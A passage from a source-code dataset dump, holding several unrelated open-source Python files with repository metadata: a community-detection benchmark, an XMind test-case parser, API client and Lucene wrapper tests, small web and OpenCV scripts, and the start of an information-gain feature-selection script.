    """Draw *G* with one colour per community and show the figure.

    Parameters
    ----------
    G : networkx graph to draw
    communities : list of communities, each a list of node ids
    name : figure title

    BUG FIX: the original indexed the colour list directly with the
    community counter, so more than 8 communities raised an IndexError.
    The colours are now cycled with a modulo (and simply reused).
    """
    pos = nx.spring_layout(G)
    colors = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w']
    plt.figure()
    plt.title(name, fontsize=20)
    for idx, community in enumerate(communities):
        nx.draw_networkx_nodes(G, pos, community, node_size=50,
                               node_color=colors[idx % len(colors)])
    nx.draw_networkx_edges(G, pos, alpha=0.5)
    plt.show(block=True)
#| This function will help us to turn the partitions generated by the methods into
#| classification lists as explained
# Turn a list of communities, where each community is a list of nodes, into a classification.
# Classification is a list of classes, where the value v in the position i means that the node
# i belongs to the community v.
def communitiesToClassification(communities):
    """Turn a list of communities into a flat classification list.

    ``communities`` is a list of communities, each community a list of
    node ids.  The result is a list where position i holds the index of
    the community that node i belongs to.

    Assumes the communities partition the node ids 0..n-1, which holds
    for every partition produced in this script.

    BUG FIX: the node count is now derived from the argument itself
    (sum of the community sizes) instead of reading the module-level
    graph ``G``, which made the function depend on a hidden global.
    """
    nNodes = sum(len(community) for community in communities)
    classification = [0] * nNodes
    for communityIndex, community in enumerate(communities):
        for node in community:
            classification[node] = communityIndex
    return classification
#| Now that we did almost everything we'll need, let's call our functions
if __name__ == "__main__":
    # Create the graph for benchmark
    G = benchmark_girvan_newman()
    # Get the true set of communities.  The LFR generator stores each
    # node's ground-truth community in the node attribute 'community'.
    communities = {frozenset(G.nodes[v]['community']) for v in G}
    communities = sorted(map(sorted, communities))
    # Turn the ground-truth partition into a per-node classification list
    realClassification = communitiesToClassification(communities)
    # List of method names (parallel to `methods` below)
    methodNames = [
        'Louvain',
        'Girvan Newman',
        'Fast Greedy',
        'Label Propagation'
    ]
    # List of community detection methods
    methods = [
        detect_communities_louvain,
        detect_communities_girvan_newman,
        detect_communities_greedy,
        detect_communities_label_propagation
    ]
    # Dict where we'll put the results
    data = {'Method': methodNames, 'Normalized Mutual Information':[]}
    # For each method in the list
    for i in range(len(methods)):
        # Apply community detection method on graph
        result = methods[i](G)
        # Plot graph with its communities and name it (disabled by default)
        #show_communities(G, result, name=methodNames[i])
        # Turn communities into a classification list
        classification = communitiesToClassification(result)
        # Calculate Normalized Mutual Information against the ground truth
        nmi = normalized_mutual_info_score(realClassification, classification, average_method='arithmetic')
        # Append NMI
        data['Normalized Mutual Information'].append(nmi)
    # Display results as a DataFrame
    df = pd.DataFrame(data)
    display(df)
#| As we can see, the Girvan-Newman method was the worst in both accuracy and execution time. The other methods did a good job of classifying the communities, with 100% accuracy.
| [
"fvvsantana@gmail.com"
] | fvvsantana@gmail.com |
c8e5b610e66fe12f06e9864a4d4e8f7b71e3ef09 | d72b976375e3dfb036d517ccb1a964dc6cb2d304 | /xmind2testcase/parser.py | ee32a7fabf7269d69b6d5fbbbc252f6a8ef24f50 | [
"MIT"
] | permissive | kingfeng999/format-conversion | 6cee87ae9401809222e776ffbfef77e7bf9a1c54 | 9260b4b44e7a6d81435478b61a87e2eba171199a | refs/heads/master | 2023-07-12T18:07:13.983277 | 2021-09-02T06:26:45 | 2021-09-02T06:26:45 | 402,277,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,738 | py | #!/usr/bin/env python
# _*_ coding:utf-8 _*_
import logging
from xmind2testcase.metadata import TestSuite, TestCase, TestStep
# Global parser configuration shared by the helpers below:
#   sep              - separator used when joining topic titles into a testcase title
#                      (overridden per sheet by sheet_to_suite)
#   valid_sep        - characters accepted as a custom title separator
#   precondition_sep - joins topic notes into the precondition text
#   summary_sep      - joins topic comments into the summary text
#   type_sep         - joins topic labels into the testcase type text
#   ignore_char      - topics/elements starting with one of these are skipped
config = {'sep': ' ',
          'valid_sep': '&>+/-',
          'precondition_sep': '\n----\n',
          'summary_sep': '\n----\n',
          # separator for the testcase type (joined from topic labels)
          'type_sep': '\n----\n',
          'ignore_char': '#!!'
          }
def xmind_to_testsuites(xmind_content_dict):
    """Convert parsed XMind content (a list of sheet dicts) to a list of
    `xmind2testcase.metadata.TestSuite` instances, one per non-blank sheet.

    Sheets without any sub topic are skipped with a warning, since a
    sheet's root topic needs at least one child (a test suite).
    """
    suites = []
    for sheet in xmind_content_dict:
        logging.debug('start to parse a sheet: %s', sheet['title'])
        root_topic = sheet['topic']
        sub_topics = root_topic.get('topics', [])
        if sub_topics:
            # Drop blank/ignored topics before building the suite tree.
            root_topic['topics'] = filter_empty_or_ignore_topic(sub_topics)
        else:
            logging.warning('This is a blank sheet(%s), should have at least 1 sub topic(test suite)', sheet['title'])
            continue
        suite = sheet_to_suite(root_topic)
        # suite.sheet_name = sheet['title'] # root testsuite has a sheet_name attribute
        logging.debug('sheet(%s) parsing complete: %s', sheet['title'], suite.to_dict())
        suites.append(suite)
    return suites
def filter_empty_or_ignore_topic(topics):
    """Recursively drop topics that are blank or whose title starts with an
    ignore character from config['ignore_char']."""
    def _keep(topic):
        title = topic['title']
        # Short-circuits so title[0] is only read for non-empty titles.
        return (title is not None
                and title.strip() != ''
                and title[0] not in config['ignore_char'])

    kept = [topic for topic in topics if _keep(topic)]
    for topic in kept:
        # Filter each surviving topic's children in place as well.
        topic['topics'] = filter_empty_or_ignore_topic(topic.get('topics', []))
    return kept
def filter_empty_or_ignore_element(values):
    """Filter empty or ignored XMind elements (notes, comments, labels).

    Non-string values are dropped; surviving strings are stripped.
    """
    kept = []
    for value in values:
        if not isinstance(value, str):
            continue
        stripped = value.strip()
        # The ignore marker is checked on the raw first character.
        if stripped == '' or value[0] in config['ignore_char']:
            continue
        kept.append(stripped)
    return kept
def sheet_to_suite(root_topic):
    """Convert an XMind sheet's root topic to a `TestSuite` instance.

    If the root title ends with one of config['valid_sep'], that final
    character is stripped from the suite name and stored as the global
    title separator (config['sep']) used by gen_testcase_title; otherwise
    the separator is reset to a space.  Note this mutates module state.
    """
    suite = TestSuite()
    root_title = root_topic['title']
    separator = root_title[-1]
    if separator in config['valid_sep']:
        logging.debug('find a valid separator for connecting testcase title: %s', separator)
        config['sep'] = separator  # set the separator for the testcase's title
        root_title = root_title[:-1]
    else:
        config['sep'] = ' '
    suite.name = root_title
    suite.details = root_topic['note']
    suite.sub_suites = []
    # Each direct child of the root topic becomes a sub test suite.
    for suite_dict in root_topic['topics']:
        suite.sub_suites.append(parse_testsuite(suite_dict))
    return suite
def parse_testsuite(suite_dict):
    """Build a TestSuite (name, details and testcase list) from a suite topic."""
    testsuite = TestSuite()
    testsuite.name = suite_dict['title']
    testsuite.details = suite_dict['note']
    testsuite.testcase_list = []
    logging.debug('start to parse a testsuite: %s', testsuite.name)
    # Each child topic tree may yield several testcases (one per leaf).
    for cases_dict in suite_dict.get('topics', []):
        testsuite.testcase_list.extend(recurse_parse_testcase(cases_dict))
    logging.debug('testsuite(%s) parsing complete: %s', testsuite.name, testsuite.to_dict())
    return testsuite
def recurse_parse_testcase(case_dict, parent=None):
    """Depth-first walk of a topic tree, yielding one TestCase per
    testcase topic (see is_testcase_topic).

    *parent* accumulates the ancestor topics on the way down.  It is a
    shared mutable list: the current topic is appended before recursing
    into its children and popped again afterwards (backtracking), so the
    same list object is reused across the whole traversal.
    """
    if is_testcase_topic(case_dict):
        case = parse_a_testcase(case_dict, parent)
        yield case
    else:
        if not parent:
            parent = []
        parent.append(case_dict)
        for child_dict in case_dict.get('topics', []):
            for case in recurse_parse_testcase(child_dict, parent):
                yield case
        parent.pop()
def is_testcase_topic(case_dict):
    """A topic with a priority marker, or without subtopics, is a testcase."""
    if get_priority(case_dict):
        return True
    # No priority marker: a topic is a testcase only when it is a leaf.
    return not case_dict.get('topics', [])
def parse_a_testcase(case_dict, parent):
    """Build a TestCase from a testcase topic and its ancestor topics.

    The testcase title/preconditions/summary/type are joined from the
    whole topic path (ancestors + the topic itself).  '无' ("none") is
    the default text when a field would otherwise be empty.

    NOTE(review): execution_type is first set from get_execution_type
    and then immediately overwritten by the label-based type below --
    the first assignment appears to have no effect; confirm intent.
    """
    testcase = TestCase()
    topics = parent + [case_dict] if parent else [case_dict]
    testcase.name = gen_testcase_title(topics)
    preconditions = gen_testcase_preconditions(topics)
    testcase.preconditions = preconditions if preconditions else '无'
    summary = gen_testcase_summary(topics)
    #testcase.summary = summary if summary else testcase.name
    # Default the summary (annotation) to '无' ("none") when empty.
    testcase.summary = summary if summary else "无"
    testcase.execution_type = get_execution_type(topics)
    testcase.importance = get_priority(case_dict) or 2
    # Assign the testcase type from topic labels; defaults to '无' ("none").
    execution_type = gen_testcase_type(topics)
    testcase.execution_type = execution_type if execution_type else '无'
    step_dict_list = case_dict.get('topics', [])
    if step_dict_list:
        testcase.steps = parse_test_steps(step_dict_list)
    # the result of the testcase takes precedence over the result of the teststeps
    testcase.result = get_test_result(case_dict['markers'])
    if testcase.result == 0 and testcase.steps:
        # Derive the testcase result from its steps: failed (2) or
        # blocked (3) wins immediately; otherwise the last step's result
        # is kept.
        for step in testcase.steps:
            if step.result == 2:
                testcase.result = 2
                break
            if step.result == 3:
                testcase.result = 3
                break
            testcase.result = step.result # there is no need to judge where test step are ignored
    logging.debug('finds a testcase: %s', testcase.to_dict())
    return testcase
def get_execution_type(topics):
    """Derive the execution type from topic labels: 2 = automated, 1 = manual.

    The innermost (last) matching label along the topic path wins, hence
    the reversed scan.  Without any matching label the default is manual.
    """
    labels = filter_empty_or_ignore_element([topic.get('label', '') for topic in topics])
    for label in reversed(labels):
        lowered = label.lower()
        if lowered in ('自动', 'auto', 'automate', 'automation'):
            return 2
        if lowered in ('手动', '手工', 'manual'):
            return 1
    return 1
def get_priority(case_dict):
    """Return the topic's priority (the testcase importance).

    Looks for a marker named 'priority<N>' and returns its trailing
    digit as an int; returns None when the topic has no marker list or
    no priority marker.
    """
    markers = case_dict['markers']
    if not isinstance(markers, list):
        return None
    for marker in markers:
        if marker.startswith('priority'):
            return int(marker[-1])
    return None
def gen_testcase_title(topics):
    """Join all topic titles along the path into one testcase title."""
    titles = filter_empty_or_ignore_element([topic['title'] for topic in topics])
    separator = config['sep']
    # A non-blank separator gets padded with spaces, e.g. '/' -> ' / '.
    if separator != ' ':
        separator = ' {} '.format(separator)
    return separator.join(titles)
def gen_testcase_preconditions(topics):
    """Join the topic notes along the path into the precondition text."""
    usable_notes = filter_empty_or_ignore_element([topic['note'] for topic in topics])
    return config['precondition_sep'].join(usable_notes)
def gen_testcase_summary(topics):
    """Join the topic comments along the path into the summary text."""
    usable_comments = filter_empty_or_ignore_element([topic['comment'] for topic in topics])
    return config['summary_sep'].join(usable_comments)
def parse_test_steps(step_dict_list):
    """Parse an ordered list of step topics into numbered TestStep objects."""
    steps = []
    for step_number, step_dict in enumerate(step_dict_list, start=1):
        step = parse_a_test_step(step_dict)
        step.step_number = step_number  # steps are numbered from 1
        steps.append(step)
    return steps
def parse_a_test_step(step_dict):
    """Build a TestStep from a step topic.

    The step's first child topic (if any) is its expected result; the
    result markers are read from the expected-result topic when present,
    otherwise from the step topic itself.
    """
    test_step = TestStep()
    test_step.actions = step_dict['title']
    expected_topics = step_dict.get('topics', [])
    if expected_topics: # have expected result
        expected_topic = expected_topics[0]
        test_step.expectedresults = expected_topic['title'] # one test step action, one test expected result
        markers = expected_topic['markers']
        test_step.result = get_test_result(markers)
    else: # only have test step
        markers = step_dict['markers']
        test_step.result = get_test_result(markers)
    logging.debug('finds a teststep: %s', test_step.to_dict())
    return test_step
def get_test_result(markers):
    """Map XMind markers to a result code.

    0 = not executed, 1 = pass, 2 = failed, 3 = blocked, 4 = skipped.
    Anything that is not a list (or matches no known marker) counts as
    not executed.
    """
    if not isinstance(markers, list):
        return 0
    # Checked in priority order: pass, failed, blocked, skipped.
    outcomes = (
        (('symbol-right', 'c_simbol-right'), 1),
        (('symbol-wrong', 'c_simbol-wrong'), 2),
        (('symbol-pause', 'c_simbol-pause'), 3),
        (('symbol-minus', 'c_simbol-minus'), 4),
    )
    for names, code in outcomes:
        if any(name in markers for name in names):
            return code
    return 0
# Get the testcase type value from the XMind content (topic labels).
def gen_testcase_type(topics):
    """Join the topic labels along the path into the testcase type text."""
    usable_labels = filter_empty_or_ignore_element([topic['label'] for topic in topics])
    return config['type_sep'].join(usable_labels)
| [
"80831093@qq.com"
] | 80831093@qq.com |
d1a70f73fb20ba0b4e77e345f0f3dd1bc1b3ff95 | f29f9ab89a1379ddbe72bc44d51e1f0ac11a1a01 | /tests.py | 0b3a86839711ed9b612dd12edaeec95d890b5959 | [] | no_license | JonnyPtn/foxholewar | b8813f232f6c66d97b2177db1cd3e684a3b876e8 | 6709c427129b55435cf7f002db50e3622f0d51c5 | refs/heads/master | 2023-03-03T10:30:57.369853 | 2021-02-10T22:19:13 | 2021-02-10T22:19:13 | 336,001,357 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,569 | py | import foxholewar
import unittest
class TestFoxholeWar(unittest.TestCase):
    """Integration tests for the foxholewar client.

    NOTE(review): these tests hit the live Foxhole War API through
    foxholewar.Client, so they need network access and their outcome
    depends on the current war state.
    """
    def setUp(self):
        # Fresh API client for every test.
        self.client = foxholewar.Client()
    def testWarInfo(self):
        # Basic sanity checks on the current-war payload.
        war = self.client.fetchCurrentWar()
        self.assertTrue(war.warId)
        self.assertTrue(war.warNumber)
        self.assertTrue(war.winner)
        self.assertTrue(war.conquestStartTime)
        # conquestEndTime may be unset only while no team has won yet.
        self.assertTrue(war.conquestEndTime or foxholewar.Team[war.winner] is foxholewar.Team.NONE)
        self.assertTrue(war.resistanceStartTime or not war.conquestEndTime)
        self.assertTrue(war.requiredVictoryTowns)
    def testMapList(self):
        # Every map and each of its text/icon items must carry the
        # expected fields; `is not None` is used where 0 is a valid value.
        mapList = self.client.fetchMapList()
        self.assertTrue(mapList)
        for map in mapList:
            self.assertTrue(map.rawName)
            self.assertTrue(map.prettyName)
            self.assertTrue(map.scorchedVictoryTowns is not None)
            self.assertTrue(map.regionId)
            for item in map.mapTextItems:
                self.assertTrue(item.text)
                self.assertTrue(item.x)
                self.assertTrue(item.y)
                self.assertTrue(item.mapMarkerType)
            for item in map.mapItems:
                self.assertTrue(item.teamId)
                self.assertTrue(item.iconType)
                self.assertTrue(item.x)
                self.assertTrue(item.y)
                self.assertTrue(item.flags is not None)
            report = self.client.fetchReport(map)
            self.assertTrue(report is not None)
if __name__ == '__main__':
    # Allow running this module directly: python tests.py
    unittest.main()
"jonathan.r.paton@googlemail.com"
] | jonathan.r.paton@googlemail.com |
f9abec6fa42e9d878564cd66daad29f560d5db88 | ef94abd0f60fae659d0a88c943bc674071ac09bb | /CV/016_Blur.py | a89599fb7396045c97c9c4b8c47c7bf4069cd577 | [] | no_license | ookeyLai/demo_rep | 544b8620f4540d6c0ddc7d6bb924bf03998bde6d | e6be1faf337aaa7f2bd7f1937cbca1f1164b13d6 | refs/heads/master | 2020-07-01T12:56:04.943928 | 2019-08-08T05:06:16 | 2019-08-08T05:06:16 | 201,182,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 18 14:59:58 2018
@author: 103009
"""
import numpy as np
import cv2
# Load the test image (BGR order, as OpenCV reads it).
pic = cv2.imread('data/test.jpg')
# Gaussian kernel size (width, height); both values must be odd.
matrix = (7,7)
# sigmaX = 0 lets OpenCV derive the standard deviation from the kernel size.
blur = cv2.GaussianBlur(pic,matrix,0)
cv2.imshow('Blur',blur)
# Block until a key is pressed, then close the preview window.
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"ookey.lai@gmail.com"
] | ookey.lai@gmail.com |
cb6accfd6065f9b2156c864d8fcd85c969a8dc89 | e53e6231dfdc768fe5c8120ff6f2d85532bd6127 | /wrappers/python/tests/test_document.py | d77c548f53cca5175e08d3f0bcbd8f4d9da8a945 | [] | no_license | shiwenxiang/clucene | 151a2aa77a721533b04789e2aa2053bea1b32494 | d9da18a8dc90be43c8da370590e528749502f3c8 | refs/heads/master | 2016-09-06T07:17:09.129196 | 2005-05-13T15:06:26 | 2009-12-10T08:54:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,612 | py | import datetime, os.path, sets, shutil, sys, time, unittest
from cStringIO import StringIO
import test_base
from pyclene import lucene
_THIS_FILENAME = test_base.getFilenameOfThisPythonTestModule(__file__)
def getFullTestSuite():
    """Bundle every TestCase class in this module into a single TestSuite."""
    suite = unittest.TestSuite()
    for caseClass in (FieldTest, DateFieldTest, DocumentTest):
        suite.addTest(unittest.makeSuite(caseClass))
    return suite
class FieldTest(test_base.CommonBaseTest):
    """Tests for pyclene's lucene.Field wrapper (construction, static
    factories and string conversion)."""
    def testConstructor_AND_properties(self):
        # Field(String name, String string, boolean store, boolean index, boolean token)
        # Construct from string:
        f = lucene.Field('theName', 'theValue', True, True, True)
        self.assertEqual(f.name, 'theName')
        self.assertEqual(f.value, 'theValue')
        self.assertEqual(f.isStored, True)
        self.assertEqual(f.isIndexed, True)
        self.assertEqual(f.isTokenized, True)
        # Construct from lucene.Reader instance:
        #_ABANDONED_:
        # PythonFileReader was eliminated because it was 90x slower than the
        # C++ FileReader (under a non-unicode build, at least).
        #pyFile = file(_THIS_FILENAME, 'rb')
        #rIn = lucene.PythonFileReader(pyFile)
        rIn = lucene.FileReader(_THIS_FILENAME)
        f = lucene.Field('theName', rIn, True, True, True)
        self.assertEqual(f.name, 'theName')
        self.assertEqual(f.value, rIn)
        # _ABANDONED_:PythonFileReader eliminated:
        #self.assertEqual(f.reader.read(), file(pyFile.name, 'rb').read())
        self.assertEqual(f.isStored, True)
        self.assertEqual(f.isIndexed, True)
        self.assertEqual(f.isTokenized, True)
        # Verify the immutability of the following properties:
        self.assertRaises(AttributeError, setattr, f, 'name', 'other')
        self.assertRaises(AttributeError, setattr, f, 'value', 'other')
        self.assertRaises(AttributeError, setattr, f, 'isStored', False)
        self.assertRaises(AttributeError, setattr, f, 'isIndexed', False)
        self.assertRaises(AttributeError, setattr, f, 'isTokenized', False)
    def test_staticFactories(self):
        # All factory-built fields share the same name/value; the last one
        # is Reader-based, so only its name and non-None value are checked.
        fields = FieldTest._createFromStaticFactories()
        for f in fields[:-1]:
            self.assertEqual(f.name, 'mime-type')
            self.assertEqual(f.value, 'text/plain')
        f = fields[-1] # Reader-based rather than materialized-string-based.
        self.assertEqual(f.name, 'mime-type')
        self.assertNotEqual(f.value, None)
    def _createFromStaticFactories():
        # Build one field per static factory, plus one Reader-based Text field.
        fields = []
        for factoryName in (
            'Keyword', 'Unindexed', 'Text', 'Unstored'
          ):
            f = getattr(lucene.Field, factoryName)('mime-type', 'text/plain')
            fields.append(f)
        # The variant of lucene.Field.Text that takes a Reader value rather
        # than a string value.
        # _ABANDONED_:PythonFileReader eliminated:
        # pyFile = file(_THIS_FILENAME, 'rb')
        # rIn = lucene.PythonFileReader(pyFile)
        rIn = lucene.FileReader(_THIS_FILENAME)
        f = lucene.Field.Text('mime-type', rIn)
        fields.append(f)
        return fields
    _createFromStaticFactories = staticmethod(_createFromStaticFactories)
    def test___str__(self):
        # CLucene 0.8.9 overflowed a buffer if Field::toString was called on
        # a field with a large value.  Exercise the Field::toString method
        # (aliased as __str__ in the Python wrapper) to ensure that it behaves
        # responsibly.
        f = lucene.Field('theName', 'theValue' * 500000, True, True, True)
        str(f); repr(f)
        f = lucene.Field('theName', '', True, True, True)
        str(f); repr(f)
        f = lucene.Field('', '', True, True, True)
        str(f); repr(f)
class DateFieldTest(test_base.CommonBaseTest):
    """Tests for pyclene's lucene.DateField static conversion helpers."""
    def test_staticMembers(self):
        self.assert_(lucene.DateField.MAX_DATE_STRING >= lucene.DateField.MIN_DATE_STRING)
        # timeToString should accept both ticks and datetime.datetime
        # instances, and produce the same string for equivalent inputs.
        ticks = int(time.time())
        stringFromTicks = lucene.DateField.timeToString(ticks)
        ticksDateTime = datetime.datetime.fromtimestamp(ticks)
        stringFromDateTime = lucene.DateField.timeToString(ticksDateTime)
        self.assertEqual(stringFromTicks, stringFromDateTime)
        # stringToTicks (returns integer ticks):
        self.assertEqual(
            lucene.DateField.stringToTicks(stringFromTicks), ticks
          )
        # stringToTime (returns datetime.datetime object):
        self.assertEqual(
            lucene.DateField.stringToTime(stringFromTicks), ticksDateTime
          )
class DocumentTest(test_base.CommonBaseTest):
    """Tests for pyclene's lucene.Document wrapper (field membership,
    retrieval and string conversion)."""
    def testConstructor(self):
        # Also used by the other tests as a factory for a fresh Document.
        d = lucene.Document()
        return d
    def test_fieldMembershipAndRetrieval(self):
        # This case tests numerous Document methods, including the pyclene
        # equivalents of CLucene's Document::add, ::getField, and ::fields.
        def requireFieldSet(doc, reqFields):
            reqFields = sets.ImmutableSet(reqFields) # Order is undefined
            # Materialized:
            self.failIf(reqFields - sets.ImmutableSet(doc.fields()))
            # Iterated:
            self.failIf(reqFields - sets.ImmutableSet([field for field in doc]))
        d = self.testConstructor()
        requireFieldSet(d, [])
        # Make sure trying to add None raises a TypeError.
        self.assertRaises(TypeError, d.add, None)
        f1 = lucene.Field.Keyword('blah1', 'value200')
        d.add(f1)
        requireFieldSet(d, [f1])
        # Unlike CLucene's Document, pyclene's does not accept multiple fields
        # with the same name.
        f1_5 = lucene.Field.Keyword('blah1', 'value')
        self.assertRaises(KeyError, d.add, f1_5)
        f2 = lucene.Field.Keyword('blah2', 'value100')
        d.add(f2)
        requireFieldSet(d, [f1, f2])
        # _ABANDONED_:PythonFileReader eliminated:
        #pyFile = file(_THIS_FILENAME, 'rb')
        #rIn = lucene.PythonFileReader(pyFile)
        rIn = lucene.FileReader(_THIS_FILENAME)
        f3 = lucene.Field.Text('other', rIn)
        d.add(f3)
        requireFieldSet(d, [f1, f2, f3])
        f4 = lucene.Field.Keyword('blah3', 'value300')
        d.add(f4)
        requireFieldSet(d, [f1, f2, f3, f4])
        f5 = lucene.Field.Keyword('aardvark', 'value500')
        d.add(f5)
        requireFieldSet(d, [f1, f2, f3, f4, f5])
        self.assertEqual(d['aardvark'], 'value500')
        self.assertEqual(d['blah1'], 'value200')
        self.assertEqual(d['blah2'], 'value100')
        self.assertEqual(d['blah3'], 'value300')
        self.assertEqual(d['other'], rIn)
        self.assertEqual(
            sets.ImmutableSet([f for f in d.fields()]),
            sets.ImmutableSet([f1,f2,f3,f4,f5])
          )
        # A Document is immutable; a field cannot be removed once it's added.
        # Ensure that a Document does not support item deletion.
        try:
            del d['aardvark']
        except TypeError:
            pass
        else:
            self.fail('Attempt to del item from Document should not have succeeded.')
    def test___str__(self):
        # Exercise CLucene's Document::toString method.
        d = self.testConstructor()
        f = lucene.Field('theName', 'theValue' * 500000, True, True, True)
        d.add(f)
        str(d); repr(d)
        for f in FieldTest._createFromStaticFactories():
            str(d); repr(d)
if __name__ == '__main__':
    # Delegate to the project's shared test driver with this module's suite.
    import test
    test.main(suite=getFullTestSuite())
| [
"schwern@pobox.com"
] | schwern@pobox.com |
f1f4168c3797c481d71296c7d960e54ea668b568 | 46e9153700e42cdf7a90fc82952d6cffbebc7a63 | /badminton.py | 6c466862601c2ccf4c983014699fe65f98d038d7 | [] | no_license | peepliuct/badminton | 1556d440cb99a2f03d06c5f51f8a80f9f1eee57e | 5dad29853371750113fdbae2de358319f3465163 | refs/heads/master | 2020-06-04T02:59:15.065395 | 2013-09-14T14:53:56 | 2013-09-14T14:53:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | import os
import urllib
import webapp2
import jinja2
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'])
class MainPage(webapp2.RequestHandler):
    """Serve the landing page rendered from the hello2.html template."""
    def get(self):
        # Render hello2.html with no template variables.
        template = JINJA_ENVIRONMENT.get_template('hello2.html')
        self.response.write(template.render())
class EventOp(webapp2.RequestHandler):
    """Request handler intended to hold event operations (unimplemented)."""
    def create(eventObj):
        # BUG FIX: the original `def create(eventObj):` had no body at all,
        # which is a SyntaxError and made the whole module unimportable.
        # `pass` keeps it a harmless no-op until it is implemented.
        # NOTE(review): the first parameter is named eventObj instead of the
        # conventional `self` -- confirm the intended calling style.
        pass
# WSGI application: a single route mapping the site root to MainPage.
app = webapp2.WSGIApplication([
    ('/', MainPage),
], debug=True)
| [
"changtai@changtai.liu"
] | changtai@changtai.liu |
75b3c4d5e2dd62fac21f0f7d3f5fee00bfbff732 | f90f218c3f8124b84141ed059a81b01d35889bc5 | /app_2gis/views.py | c3c1da7f6076610ae977fc45d9e14cad5fed73fd | [] | no_license | rodakalex/mapApi | 1c62141e7beb098a9e6c2bd11d0b6749d066d912 | adbbee4adb0668ce605128d917c1f78411d956fa | refs/heads/master | 2023-02-19T04:30:33.802873 | 2021-01-19T21:04:15 | 2021-01-19T21:04:15 | 330,678,566 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | from rest_framework.response import Response
from rest_framework.views import APIView
from django.shortcuts import render
from .models import Path
def index(request):
    """Render the map landing page (templates/index.html)."""
    template_context = {}
    return render(request, "index.html", context=template_context)
class Coord(APIView):
    """Read-only endpoint returning every stored Path record."""
    def get(self, request):
        # Fetch all Path rows and hand them to DRF under the "coords" key.
        queryset = Path.objects.all()
        return Response({"coords": queryset})
| [
"ravengothic@mail.ru"
] | ravengothic@mail.ru |
2155f6826ed7b9607bfc77f9e46bc7b6daf29ed5 | 95d64b1dea3db73e85562aa2665c3a696370a679 | /code/information-gain.py | da46714604a93ed9d59f09d41c3b92d03c5e7812 | [] | no_license | Smolky/exist-2021 | 7481e36fb3f44263c1a2190890fc6ac894c4fac5 | 2d51a01a829cb9e9b44eca5b9eefb06cb62162c8 | refs/heads/main | 2023-05-30T14:21:56.913663 | 2021-06-16T08:10:36 | 2021-06-16T08:10:36 | 364,022,851 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,758 | py | """
Information Gain per class
This class calculates the Information Gain (Mutual Info) of a dataset
and uses it to select the most discriminatory features
@author José Antonio García-Díaz <joseantonio.garcia8@um.es>
@author Rafael Valencia-Garcia <valencia@um.es>
"""
import os
import sys
import argparse
import pandas as pd
import numpy as np
import pickle
from pathlib import Path
from sklearn import preprocessing
from sklearn.feature_selection import mutual_info_classif
from sklearn.feature_selection import mutual_info_regression
from dlsdatasets.DatasetResolver import DatasetResolver
from utils.Parser import DefaultParser
from features.FeatureResolver import FeatureResolver
from sklearn.pipeline import Pipeline, FeatureUnion
from features.TokenizerTransformer import TokenizerTransformer
def main ():
    """Calculate the Information Gain (mutual information) of each cached
    linguistic feature with respect to the label and print the most and
    least discriminatory features, per dataset and (for classification
    tasks) per label."""
    # @var parser DefaultParser
    parser = DefaultParser (description = 'Calculates the Information Gain (Mutual Info) per class and obtains the best LF')
    # @var args Get arguments
    args = parser.parse_args ()
    # @var dataset_resolver DatasetResolver
    dataset_resolver = DatasetResolver ()
    # @var dataset Dataset This is the custom dataset for evaluation purposes
    dataset = dataset_resolver.get (args.dataset, args.corpus, args.task, False)
    dataset.filename = dataset.get_working_dir (args.task, 'dataset.csv')
    # @var df DataFrame Ensure if we already had the data processed
    df = dataset.get ()
    # @var task_type String Either 'classification' or 'regression'
    task_type = dataset.get_task_type ()
    # @var df_train DataFrame Training split, rows without a label removed
    df_train = dataset.get_split (df, 'train')
    df_train = df_train[df_train['label'].notna()]
    # @var feature_resolver FeatureResolver
    feature_resolver = FeatureResolver (dataset)
    # @var feature_file String
    feature_file = feature_resolver.get_suggested_cache_file ('lf', task_type)
    # @var features_cache String The file where the features are stored
    features_cache = dataset.get_working_dir (args.task, feature_file)
    # Abort when the cached linguistic features are missing.
    # BUG FIX: the original followed this raise with an unreachable
    # sys.exit () call (dead code) and had a typo in the message.
    if not Path (features_cache).is_file ():
        raise Exception ('features lf file is not available')
    # @var transformer Transformer
    transformer = feature_resolver.get ('lf', cache_file = features_cache)
    # @var features_df DataFrame
    features_df = transformer.transform ([])
    # @var linguistic_features List
    linguistic_features = features_df.columns.to_list ()
    # Keep only the training features, aligned with the training rows
    features_df = features_df[features_df.index.isin (df_train.index)].reindex (df_train.index)
    # Attach the label column
    features_df = features_df.assign (label = df_train['label'])
    # @var unique_labels List Available labels of the dataset
    unique_labels = dataset.get_available_labels ()
    # @var X DataFrame All columns except the label
    X = features_df.loc[:, features_df.columns != 'label']
    # @var mi ndarray Mutual information of every feature with the label
    if 'classification' == task_type:
        mi = mutual_info_classif (X = X, y = df_train['label']).reshape (-1, 1)
    else:
        # BUG FIX: the original condition was `elif 'regression':`, which is
        # always true (a non-empty string), so it already behaved as an else
        # branch; this makes that intent explicit without changing behaviour
        mi = mutual_info_regression (X = X, y = df_train['label']).reshape (-1, 1)
    # @var best_features_indexes DataFrame One coefficient per feature
    best_features_indexes = pd.DataFrame (mi,
        columns = ['Coefficient'],
        index = linguistic_features
    )
    if 'regression' == task_type:
        print ("by dataset")
        print ("----------")
        best_features_indexes.index = linguistic_features
        print ("top")
        print (best_features_indexes.sort_values (by = 'Coefficient', ascending = False).head (20).to_csv (float_format = '%.5f'))
        print ("worst")
        print (best_features_indexes.sort_values (by = 'Coefficient', ascending = True).head (10).to_csv (float_format = '%.5f'))
    if 'classification' == task_type:
        # @var average_features_per_label List Mean feature vector per label
        average_features_per_label = [features_df.loc[df_train.loc[features_df['label'] == label].index].mean ().to_frame ().T for label in unique_labels]
        # Merge features by label
        features_df_merged = pd \
            .concat (average_features_per_label) \
            .reset_index (drop = True) \
            .assign (label = unique_labels) \
            .set_index ('label') \
            .transpose ()
        # Attach coefficient to the features
        features_df_merged = features_df_merged.assign (Coefficient = best_features_indexes.values)
        print ("by dataset")
